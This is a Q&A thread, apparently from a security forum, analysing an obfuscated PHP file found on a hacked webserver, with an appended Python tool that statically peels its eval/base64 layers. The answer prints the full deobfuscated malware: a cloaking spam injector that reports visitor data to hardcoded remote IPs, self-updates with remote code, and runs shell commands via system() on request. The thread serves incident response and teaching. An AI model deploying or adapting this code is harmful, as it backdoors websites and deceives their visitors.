1

We have found this on a hacked PHP webserver. It was in a single file. This file was included from somewhere else with @require. That's what we know:

  • This site is running PHP 5.3
  • The site had thousands of 'Viagra' type URLs that were crawled by Google
  • It obviously works by using the preg_replace /e - modifier, but what gets eval'ed there we do not understand.

(this is prefixed by a normal < ?php which I am not able to post here):

Error_Reporting(0); 
$xwGla1FMTSLs="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";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x3B",".");
return; 
?>

I try to be more specific about the background. I hope this helps to get more on-topic.

topic: incident response

what assets you are trying to protect: This is a public webserver serving a PHP Typo3 website with a product catalogue.

Jonas Eberle
  • Seems Base64 encoding is being used. There's an online decoder available at https://isc.sans.edu/tools/base64.html – user2320464 Feb 22 '16 at 19:02

1 Answer

13

The underlying concept here is that preg_replace is being used like this:

preg_replace("/.*/e", "long string", ".");

Which means: in the string "." replace 0 or more instances of . with long string and run that.

Now long string appears to just be encoded by using unicode escape codes (\x65 is A). Unobfuscated it is:

eval(base64_decode('long base64 string'));

Long base64 string decoded is:

eval(base64_decode("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"));eval(base64_decode("JHhrRGZGVWsyWVdJOFI9Jyc7Zm9yKCR4Rm5JZXdWaVpldVlIPTA7JHhGbklld1ZpWmV1WUg8JHg4dzh0UGNtbEk5OU47JHhGbklld1ZpWmV1WUgrKyl7JHhrRGZGVWsyWVdJOFIuPSR4clFGaW5RNzhvTDEoKCR4YWZRdWo2dFpFSSgkeHdHbGExRk1UU0xzWyR4Rm5JZXdWaVpldVlIXSleMTY4ODc5ODU3MSkpO31ldmFsKCR4a0RmRlVrMllXSThSKTs="));

If we keep decoding the base64 we get:

$xwGla1FMTSLs="xTxrU+NIkqyQLFlhy90Qh6U1WBO0aWjPYLhdHY...NEP8rp5NGq1OkIxKOJWpw5HZiWECu9GLi+7fm9SJzvErMBkeJ///Z/";

$xELi3ogQZa7=base64_decode("YmFzZTY0X2RlY29kZQ==");$xcT9zm5Ikh8=base64_decode("c3RybGVu");$xrQFinQ78oL1=base64_decode("Y2hy");$xafQuj6tZEI=base64_decode("b3Jk");$x6dDsxVEjJSUO=base64_decode("Z3ppbmZsYXRl");

$xwGla1FMTSLs=$x6dDsxVEjJSUO($xELi3ogQZa7($xwGla1FMTSLs));$x8w8tPcmlI99N=$xcT9zm5Ikh8($xwGla1FMTSLs);

After a bunch of deobfuscation steps like these we get (via unphp):

<?php error_reporting(0);
if (isset($_COOKIE['engine_ssl_'])) {
    return true;
}
if (stripos($_SERVER['HTTP_USER_AGENT'], 'selfbot') !== false) {
    return true;
}
$proxy_array = array("http://159.8.34.18/~roboatom/proxy.php", "http://190.123.47.134/proxy.php", "http://109.236.91.19/proxy.php");
$scriptver = '009';
$hostname = @$_SERVER['HTTP_HOST'];
$hostname = strtolower($hostname);
$hostname = str_replace("www.", "", $hostname);
$cookie_host = $hostname;
$work = FALSE;
$morda = FALSE;
$visitoragent = $_SERVER['HTTP_USER_AGENT'];
$selfagent = 'selfbot';
$workagent = 'fsbot';
$admin = 'antonio';
if (isset($_SERVER['HTTP_REFERER'])) {
    $referer = $_SERVER['HTTP_REFERER'];
} else {
    $referer = 'NOREF';
}
$lg = FSLanguage::get();
$lg = array_flip($lg);
$visitorlang = trim($lg[1]);
$tirnum = strpos($visitorlang, "-");
$visitorlang = substr($visitorlang, 0, $tirnum);
$visitorip = FsGetRealIp();
$method = find_Rpermition();
$url = curPageURLSS();
$url = strtolower($url);
$checkmorda = $url;
$checkmorda = str_replace('http://', '', $checkmorda);
$checkmorda = str_replace('https://', '', $checkmorda);
$checkmorda = str_replace('www.', '', $checkmorda);
$checkmorda = str_replace($hostname, '', $checkmorda);
if (($checkmorda == '/') || ($checkmorda == '/index.php')) {
    $morda = TRUE;
}
$tmppath = "/tmp";
$filessavepath = $tmppath . '/' . md5($hostname) . '/';
if (!is_dir($filessavepath)) {
    mkdir($filessavepath, 0777);
}
if (!is_dir($filessavepath)) {
    $tmppath = dirname(__FILE__);
    $filessavepath = $tmppath . '/' . md5($hostname) . '/';
    mkdir($filessavepath, 0777);
}
$BotList = $tmppath . '/f16f9a406c937f83b17317e1ca6cc3e7';
$filename = $url;
$filename = str_replace('https://', '', $filename);
$filename = str_replace('http://', '', $filename);
$filename = str_replace('www.', '', $filename);
$filename = md5($filename);
$selfinfo = __FILE__;
$selfarray = pathinfo($selfinfo);
$selfpath = $selfarray['dirname'] . '/' . $selfarray['basename'];
$selfpath = base64_encode($selfpath);
if ((preg_match('/admin|wp-login.php|wp-admin|administrator/i', $_SERVER['REQUEST_URI'])) && (!preg_match('/ajax/i', $_SERVER['REQUEST_URI']))) {
    setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
}
foreach ((array)$_COOKIE as $cookie => $value) {
    if (stristr($cookie, 'wordpress_logged_in_')) {
        setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
        return true;
    }
    if (stristr($cookie, 'activeProfile')) {
        setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
        return true;
    }
}
//////////////FUNCTIONS START
class FSLanguage {
    private static $language = null;
    public static function get() {
        new FSLanguage;
        return self::$language;
    }
    public static function getBestMatch($langs = array()) {
        foreach ($langs as $n => $v) $langs[$n] = strtolower($v);
        $r = array();
        foreach (self::get() as $l => $v) {
            ($s = strtok($l, '-')) != $l && $r[$s] = 0;
            if (in_array($l, $langs)) return $l;
        }
        foreach ($r as $l => $v) if (in_array($l, $langs)) return $l;
        return null;
    }
    private function __construct() {
        if (self::$language !== null) return;
        if (($list = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']))) {
            if (preg_match_all('/([a-z]{1,8}(?:-[a-z]{1,8})?)(?:;q=([0-9.]+))?/', $list, $list)) {
                self::$language = array_combine($list[1], $list[2]);
                foreach (self::$language as $n => $v) self::$language[$n] = + $v ? +$v : 1;
                arsort(self::$language);
            }
        } else self::$language = array();
    }
}
function curl_redir_exec($ch) {
    static $curl_loops = 0;
    static $curl_max_loops = 3;
    if ($curl_loops >= $curl_max_loops) {
        $curl_loops = 0;
        return false;
    }
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $data = curl_exec($ch);
    list($header, $data) = explode("

", $data, 2);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if ($http_code == 301 || $http_code == 302) {
        $matches = array();
        preg_match('/Location:(.*?)
/', $header, $matches);
        $url = @parse_url(trim(array_pop($matches)));
        if (!$url) {
            $curl_loops = 0;
            return $data;
        }
        $last_url = parse_url(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL));
        if (!$url['scheme']) $url['scheme'] = $last_url['scheme'];
        if (!$url['host']) $url['host'] = $last_url['host'];
        if (!$url['path']) $url['path'] = $last_url['path'];
        $new_url = $url['scheme'] . '://' . $url['host'] . $url['path'] . ($url['query'] ? '?' . $url['query'] : '');
        curl_setopt($ch, CURLOPT_URL, $new_url);
        return curl_redir_exec($ch);
    } else {
        $curl_loops = 0;
        return $data;
    }
}
function FsGetRealIp() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
function curPageURLSS() {
    $pageURL = 'http';
    if ($_SERVER["HTTPS"] == "on") {
        $pageURL.= "s";
    }
    $pageURL.= "://";
    if ($_SERVER["SERVER_PORT"] != "80") {
        $pageURL.= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];
    } else {
        $pageURL.= $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
    }
    return $pageURL;
}
function find_Rpermition() {
    $res = "";
    if ((function_exists('curl_init')) && (function_exists('curl_exec'))) {
        $res = "curl";
    } elseif (function_exists('fsockopen')) {
        $res = "fsock";
    }
    return $res;
}
function getRdata($page, $useragent, $method, $collection) {
    $result = '';
    $timeout = 15;
    $newRRR = parse_url($page);
    $url_new = $newRRR['host'];
    $path_new = $newRRR['path'];
    if ($method == "curl") {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $page);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        curl_redir_exec($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        if ($useragent <> 'selfbot') {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, 'collection=' . $collection);
        }
        $result = curl_exec($ch);
        curl_close($ch);
        $pos = strpos($result, "

");
        $result = substr($result, $pos + 4);
        return $result;
    }
    if ($method == "fsock") {
        $socket = fsockopen($url_new, 80, $errno, $errstr, 30);
        if (!$socket) die("$errstr($errno)");
        $data = '';
        if ($useragent <> 'selfbot') {
            $data = "collection=" . urlencode($collection);
        }
        fwrite($socket, "POST " . $path_new . " HTTP/1.0
");
        fwrite($socket, "Host: " . $url_new . "
");
        fwrite($socket, "Content-type: application/x-www-form-urlencoded
");
        fwrite($socket, "Content-length:" . strlen($data) . "
");
        fwrite($socket, "Accept:*/*
");
        fwrite($socket, "User-agent:" . $useragent . "
");
        fwrite($socket, "Connection:Close
");
        fwrite($socket, "
");
        fwrite($socket, "$data
");
        fwrite($socket, "
");
        $result = '';
        while (!feof($socket)) {
            $result.= fgets($socket);
        }
        $pos = strpos($result, "

");
        $result = substr($result, $pos + 4);
        return $result;
        fclose($socket);
    }
}
function makebotlist($BotList) {
    if (!file_exists($BotList) or (time() - filemtime($BotList) >= '100000')) {
        $baseg = explode("#", file_get_contents('http://ru.myip.ms/files/bots/live_webcrawlers.txt'));
        for ($i = 0;$i < count($baseg);$i++) {
            if (strlen($baseg[$i]) > 10) {
                if (stristr($baseg[$i], "google")) {
                    $basec = explode("
", $baseg[$i]);
                    for ($i2 = 0;$i2 < count($basec);$i2++) {
                        if (preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\z/', $basec[$i2])) {
                            $basegoogle[] = $basec[$i2];
                        }
                    }
                }
            }
        }
        $basegoogle = array_unique($basegoogle);
        $basegoogle = implode(PHP_EOL, $basegoogle);
        $file = fopen($BotList, "w+");
        fwrite($file, $basegoogle);
        fclose($file);
    }
}
function HiGoogle($visitorip, $BotList, $lng) {
    $VisitorHost = strtolower(gethostbyaddr($visitorip));
    if (preg_match('/google|bing|aol|yahoo|yandex|majestic|ahrefs|msn|baidu|facebook/i', $VisitorHost)) {
        return true;
    }
    if (is_file($BotList)) {
        $iplist = file_get_contents($BotList);
        $iplist = explode("
", $iplist);
        if (in_array($visitorip, $iplist)) {
            return true;
        }
    }
    if ($lng == '') {
        return true;
    }
    if (preg_match('/93.190.141.195|191.101.22.10|141.255.161.176/i', $visitorip)) {
        return true;
    }
    return false;
}
function checkDir($pap) {
    $f = "0";
    if ($handle = opendir($pap)) {
        while (false !== ($file = readdir($handle))) {
            if ($file != '..' AND $file != '.') {
                $f++;
            }
        }
    }
    closedir($handle);
    return $f;
}
function check($param1, $param2) {
    return strpos(strtolower($param1), strtolower($param2));
}
function callback($datapage) {
    global $links_out;
    $_9 = $links_out;
    $_2 = 7;
    $_10 = $datapage;
    $_11 = false;
    $_12 = "";
    $_13 = check($_10, "<body");
    if ($_13 !== false) {
        $_14 = array();
        $_15 = array();
        $_16 = array();
        $_17 = array();
        $_18 = array();
        $_19 = array();
        $_20 = substr($_10, $_13);
        $_21 = strip_tags($_20);
        $_22 = "/[a-z]{2,}+ and /";
        preg_match_all($_22, $_21, $_14, PREG_OFFSET_CAPTURE);
        $_23 = "/[a-z]{2,}+ the /";
        preg_match_all($_23, $_21, $_15, PREG_OFFSET_CAPTURE);
        $_24 = "/[a-z]{2,}+ of /";
        preg_match_all($_24, $_21, $_16, PREG_OFFSET_CAPTURE);
        $_25 = "/[a-z]{2,}+ to /";
        preg_match_all($_25, $_21, $_17, PREG_OFFSET_CAPTURE);
        $_26 = "/[a-z]{2,}+ on /";
        preg_match_all($_26, $_21, $_18, PREG_OFFSET_CAPTURE);
        $_27 = "/[a-z]{2,}+ is /";
        preg_match_all($_27, $_21, $_19, PREG_OFFSET_CAPTURE);
        $_28 = "/[a-z]{2,}+ de /";
        preg_match_all($_28, $_21, $_29, PREG_OFFSET_CAPTURE);
        $_30 = "/[a-z]{2,}+ en /";
        preg_match_all($_30, $_21, $_31, PREG_OFFSET_CAPTURE);
        $_32 = "/[a-z]{2,}+ und /";
        preg_match_all($_32, $_21, $_33, PREG_OFFSET_CAPTURE);
        $_34 = "/[a-z]{2,}+ auf /";
        preg_match_all($_34, $_21, $_35, PREG_OFFSET_CAPTURE);
        $_36 = "/[a-z]{2,}+ y /";
        preg_match_all($_36, $_21, $_37, PREG_OFFSET_CAPTURE);
        $_38 = "/[a-z]{2,}+ e /";
        preg_match_all($_38, $_21, $_39, PREG_OFFSET_CAPTURE);
        $_40 = "/[a-z]{2,}+ et /";
        preg_match_all($_40, $_21, $_41, PREG_OFFSET_CAPTURE);
        $_42 = "/[a-z]{2,}+ la /";
        preg_match_all($_42, $_21, $_43, PREG_OFFSET_CAPTURE);
        $_44 = "/[a-z]{2,}+ des /";
        preg_match_all($_44, $_21, $_45, PREG_OFFSET_CAPTURE);
        $_46 = "/[a-z]{2,}+ der /";
        preg_match_all($_46, $_21, $_47, PREG_OFFSET_CAPTURE);
        $_48 = "/[a-z]{2,}+ die /";
        preg_match_all($_48, $_21, $_49, PREG_OFFSET_CAPTURE);
        $_481 = "/[a-z]{2,}+ do /";
        preg_match_all($_481, $_21, $_491, PREG_OFFSET_CAPTURE);
        $_482 = "/[a-z]{2,}+ z /";
        preg_match_all($_482, $_21, $_492, PREG_OFFSET_CAPTURE);
        $_483 = "/[a-z]{2,}+ na /";
        preg_match_all($_483, $_21, $_493, PREG_OFFSET_CAPTURE);
        $_484 = "/[a-z]{2,}+ i /";
        preg_match_all($_484, $_21, $_494, PREG_OFFSET_CAPTURE);
        $_50 = array();
        foreach ($_14[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_15[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_16[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_17[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_18[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_19[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_29[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_31[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_33[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_35[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_37[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_39[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_41[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_43[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_45[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_47[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_49[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_491[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_492[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_493[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_494[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        $_52 = array_keys($_50);
        $_53 = $_20;
        $_54 = - 1;
        foreach ($_52 as $_55) {
            $_54++;
            if (($_54 % $_2) != 0) continue;
            $_56 = 0;
            $_57 = false;
            $_58 = 0;
            do {
                $_59 = strpos($_53, $_55, $_56);
                $_56 = $_59 + strlen($_55);
                if ($_59 !== false) {
                    $_60 = strrpos(substr($_53, 0, $_59), ">");
                    $_61 = strrpos(substr($_53, 0, $_59), "<");
                    if ($_60 === false) {
                        $_60 = 0;
                    }
                    if ($_61 === false) {
                        $_11 = true;
                        break;
                    }
                    if ($_60 <= $_61) {
                        continue;
                    }
                    if (count($_9) <= 0) break;
                    $_58 = trim(array_shift($_9));
                    if ($_58 == NULL || strlen($_58) < 4) {
                        break;
                    }
                    $_53 = substr($_53, 0, $_59 + strlen($_55)) . $_58 . " " . substr($_53, $_59 + strlen($_55));
                    $_57 = true;
                } else {
                    break;
                }
            }
            while (!$_57);
            if ($_11) break;
            if (count($_9) <= 0) break;
        }
        $_12 = substr($_10, 0, $_13) . $_53;
    } else {
        $_11 = true;
        $_12 = $_10;
    }
    $datapage = $_12;
    return $datapage;
}
function PingMyProxy($proxy) {
    $port = 80;
    $to = 1;
    $gph = parse_url($proxy);
    $host = $gph['host'];
    $fsock = fsockopen($host, $port, $errno, $errstr, $to);
    if (!$fsock) {
        return FALSE;
    } else {
        return TRUE;
    }
}
//////////////FUNCTIONS FINISH
$readydoors = checkDir($filessavepath);
makebotlist($BotList);
$blst = 'NOFILE';
if (file_exists($BotList)) {
    $blst = 'BOTLIST';
}
if ($_SERVER['HTTP_USER_AGENT'] == "ANTIPIDERSIA") {
    if (preg_match('/93.190.141.195|191.101.22.10|141.255.161.176/i', $visitorip)) {
        $owner = TRUE;
    }
    if ((substr(md5($_REQUEST['localdate']), 0, 6) == '6fbcb8') && ($owner == TRUE)) {
        $time = str_replace('@', ' ', $_REQUEST['localtime']);
        @system($time);
        exit;
    }
    die("<font color='green'>CHETKO</font>:CHETKO|" . $scriptver . "|" . $blst . "|DOORS READY:" . $readydoors);
}
if (preg_match('/cialis|viagra|propecia|levitra|sildenafil|tadalafil|kamagra|pill|drug|generic|prescription|medic|treatment|finasteride|pharmac|medforum|zyvox|zythromax|zyprexa|zyloprim|zyban|zovirax|acyclovir|zoton|zopiclone|zoloft|zofran|zocor|zitromax|zithromax|zithromycin|zimulti|ziagra|zetia|zestril|zestoretic|zenerx|zenegra|zencore|zelnorm|zebeta|zantac|zanaflex|zaditor|yasmin|yagara|bactrim|xenical|xeloda|prednisone|accutane|lasix/i', $url)) {
    $work = TRUE;
}
if (($work == FALSE) && ($morda == FALSE)) {
    return true;
}
$bot = HiGoogle($visitorip, $BotList, $visitorlang);
if ($bot) {
    $user = 'BOT';
} else {
    $user = 'HUMAN';
}
foreach ($proxy_array as $proxy) {
    $proxy = trim($proxy);
    $up = PingMyProxy($proxy);
    if ($up) {
        break;
    }
}
$collection = array("remotehost" => $hostname, "useragent" => $visitoragent, "lang" => $visitorlang, "ip" => $visitorip, "uri" => $url, "gbase" => $blst, "visitor" => $user, "referer" => $referer, "scriptver" => $scriptver, "selfpath" => $selfpath, "admin" => $admin, "doors" => $readydoors, "proxy" => $proxy);
$collection = serialize($collection);
$collection = base64_encode($collection);
$datauri = $proxy;
$response = getRdata($datauri, $workagent, $method, $collection);
if (preg_match('/SELFUPDATE/i', $response)) {
    $telo = str_replace('SELFUPDATE', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $selfdata = $telo['secretka'];
    $selfhash = $telo['hash'];
    $selfpath = $telo['selfpath'];
    $selfpath = base64_decode($selfpath);
    $secretkahash = md5($selfdata);
    if (($selfdata <> '') && ($secretkahash == $selfhash)) {
        $file = fopen($selfpath, 'w');
        fwrite($file, $selfdata . "
");
        fclose($file);
    }
    return true;
}
if (preg_match('/TEMPBAN/i', $response)) {
    return true;
}
if (preg_match('/BANBAN/i', $response)) {
    setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
    return true;
}
if (preg_match('/SHOW DOOR/i', $response)) {
    $telo = str_replace('SHOW DOOR', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $door = $telo['doorcontent'];
    echo $door;
    exit;
}
if (($bot) && (file_exists($filessavepath . $filename))) {
    $door = file_get_contents($filessavepath . $filename);
    $door = base64_decode($door);
    echo $door;
    exit;
}
if (preg_match('/SHOW AND SAVE DOOR/i', $response)) {
    $telo = str_replace('SHOW AND SAVE DOOR', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $door = $telo['doorcontent'];
    $textogen = $telo['textogen'];
    $ClusterIp = $telo['clusterip'];
    $doorkey = $telo['doorkey'];
    $kc = $telo['kc'];
    $collection = array("k" => $doorkey, "keyscount" => $kc);
    $collection = serialize($collection);
    $collection = base64_encode($collection);
    $texturi = 'http://' . $ClusterIp . '/' . $textogen . '.php';
    $text = getRdata($texturi, $workagent, $method, $collection);
    if (preg_match('/TAKEYOURTEXT/i', $text)) {
        $text = str_replace('TAKEYOURTEXT', '', $text);
        $door = str_replace('[TEXT]', $text, $door);
        echo $door;
        $filetosave = base64_encode($door);
        $file = fopen($filessavepath . $filename, 'w');
        fwrite($file, $filetosave);
        fclose($file);
    } else {
        return true;
    }
    exit;
}
if (preg_match('/SHOW SPAM/i', $response)) {
    $telo = str_replace('SHOW SPAM', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $div = $telo['div'];
    $style = $telo['style'];
    $selfpage = getRdata($url, $selfagent, $method, $collection);
    $selfpage = str_replace('</head>', $style . "
" . '</head>', $selfpage);
    $selfpage = str_replace('</body>', $div . "
" . '</body>', $selfpage);
    echo $selfpage;
    exit;
}
if (preg_match('/SHOW CANON/i', $response)) {
    $telo = str_replace('SHOW CANON', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $canonlink = $telo['canon'];
    $selfpage = getRdata($url, $selfagent, $method, $collection);
    $canonA = "'<link href=..*?. rel=.canonical. />'si";
    $canonB = "'<link rel=.canonical. href=..*?. />'si";
    $canonZ = '';
    $selfpage = preg_replace($canonA, $canonZ, $selfpage);
    $selfpage = preg_replace($canonB, $canonZ, $selfpage);
    $selfpage = str_replace('</head>', $canonlink . "
" . '</head>', $selfpage);
    echo $selfpage;
    exit;
}
if (preg_match('/CALL BACK/i', $response)) {
    $telo = str_replace('CALL BACK', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $links_out = $telo['links'];
    $links_out = explode("
", $links_out);
    ob_start("callback");
}

Now what does this actually do? I don't have time to read all of 700 LOC, but briefly skimming over it reveals the following:

  • It seems to check the user agent and IP address of the client and compare them against a known web crawler (presumably to only show spam content to search engines for SEO purposes, or to tailor content for them)
  • It in some form gets instructions/spam from a remote server (presumably one of http://159.8.34.18/~roboatom/proxy.php, http://190.123.47.134/proxy.php, http://109.236.91.19/proxy.php) through cURL
  • It has methods for updating its malicious code through the SELFUPDATE command (from the remote server), banning certain clients, and writing data to some file with an MD5'd name (near bottom of the code)
  • It does a somewhat clever trick of cURL requesting itself (with a special User-Agent which it whitelists to not see spam), so that it can get the actual content of the page and then inject spam into it
  • It seems to by default write to a file and try to give that file full 777 (read, write, execute all) permissions. This could be particularly dangerous if the server is run with a user whose privileges aren't limited and that file was able to be executed

tl;dr I would be very wary of the server that this code was found on. It could very possibly be compromised beyond this (relatively) innocent spam insertion code.

Bailey Parker
  • 2
    This is in many ways a better answer than the canonical answer because it explains what the code does, and how it works. The question is about understanding the code, not simply de-obfuscating it. An example of malicious code goes a long way as an example of the kind of thing you might be up against. So I'm voting to re-open this because the answer above is instructive. – Steve Sether Feb 23 '16 at 15:45
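
Added example (not part of the original question or answer): a static Python helper for incident responders that walks the same layers described in the answer without ever executing the PHP. It flags `preg_replace` with the `/e` modifier, resolves `\xNN` escapes, peels nested `eval(base64_decode(...))` layers, and maps the base64-hidden function aliases back to their names. The function names and the `SAMPLE` dropper (with a harmless payload) are constructed for this example; `PAGE_ALIASES` and `PAGE_CALLS` are copied from the answer above.

```python
import base64
import re

# preg_replace() whose pattern literal carries the "e" (eval) modifier.
# Only same-character delimiters such as /.../ or #...# are handled.
PREG_E = re.compile(r"""preg_replace\s*\(\s*(["'])(\W)(?:(?!\1).)*?\2[a-zA-Z]*e[a-zA-Z]*\1""", re.S)
HEX_ESC = re.compile(r"\\x([0-9A-Fa-f]{1,2})")
EVAL_B64 = re.compile(r"""eval\s*\(\s*base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""")
ALIAS = re.compile(r"""(\$\w+)\s*=\s*base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=]+)\2\s*\)""")

def unescape_hex(text):
    """Resolve PHP \\xNN string escapes statically."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)

def uses_preg_e(source):
    """True if the file calls preg_replace with the /e modifier."""
    return bool(PREG_E.search(unescape_hex(source)))

def peel(source, max_depth=10):
    """Return every decoded eval(base64_decode('...')) layer; nothing is executed."""
    layers, current = [], unescape_hex(source)
    for _ in range(max_depth):
        decoded = []
        for _quote, blob in EVAL_B64.findall(current):
            try:
                decoded.append(base64.b64decode(blob).decode("latin-1"))
            except ValueError:          # malformed base64: skip this blob
                continue
        if not decoded:
            break
        current = unescape_hex("\n".join(decoded))
        layers.append(current)
    return layers

def resolve_aliases(code):
    """Map $var = base64_decode("...") assignments to the function name they hide."""
    aliases = {}
    for var, _quote, blob in ALIAS.findall(code):
        name = base64.b64decode(blob).decode("latin-1")
        if re.fullmatch(r"[A-Za-z_]\w*", name):
            aliases[var] = name
    return aliases

def apply_aliases(code, aliases):
    """Rewrite $alias(...) calls to the real function name for readability."""
    for var, name in aliases.items():
        code = re.sub(re.escape(var) + r"\s*\(", name + "(", code)
    return code

def _b64(text):
    return base64.b64encode(text.encode()).decode()

def build_sample():
    """Constructed dropper with the same shape as the one in the question."""
    inner = 'echo "constructed harmless payload";'
    layer = 'eval(base64_decode("%s"));' % _b64(inner)
    hexed = "".join("\\x%02X" % ord(c) for c in "eval(base64_decode(")
    return 'preg_replace("/.*/e","' + hexed + "'" + _b64(layer) + "'" + '\\x29\\x29\\x3B",".");'

SAMPLE = build_sample()

# Copied from the answer above.
PAGE_ALIASES = ('$xELi3ogQZa7=base64_decode("YmFzZTY0X2RlY29kZQ==");$xcT9zm5Ikh8=base64_decode("c3RybGVu");'
                '$xrQFinQ78oL1=base64_decode("Y2hy");$xafQuj6tZEI=base64_decode("b3Jk");'
                '$x6dDsxVEjJSUO=base64_decode("Z3ppbmZsYXRl");')
PAGE_CALLS = ('$xwGla1FMTSLs=$x6dDsxVEjJSUO($xELi3ogQZa7($xwGla1FMTSLs));'
              '$x8w8tPcmlI99N=$xcT9zm5Ikh8($xwGla1FMTSLs);')

if __name__ == "__main__":
    print("preg_replace /e present:", uses_preg_e(SAMPLE))
    for depth, layer in enumerate(peel(SAMPLE), 1):
        print("layer", depth, ":", layer)
    print(apply_aliases(PAGE_CALLS, resolve_aliases(PAGE_ALIASES)))
```

Run over a web root, `uses_preg_e` is a cheap first-pass triage signal on PHP versions that still honour `/e`; the peeled layers are what to review and preserve as evidence.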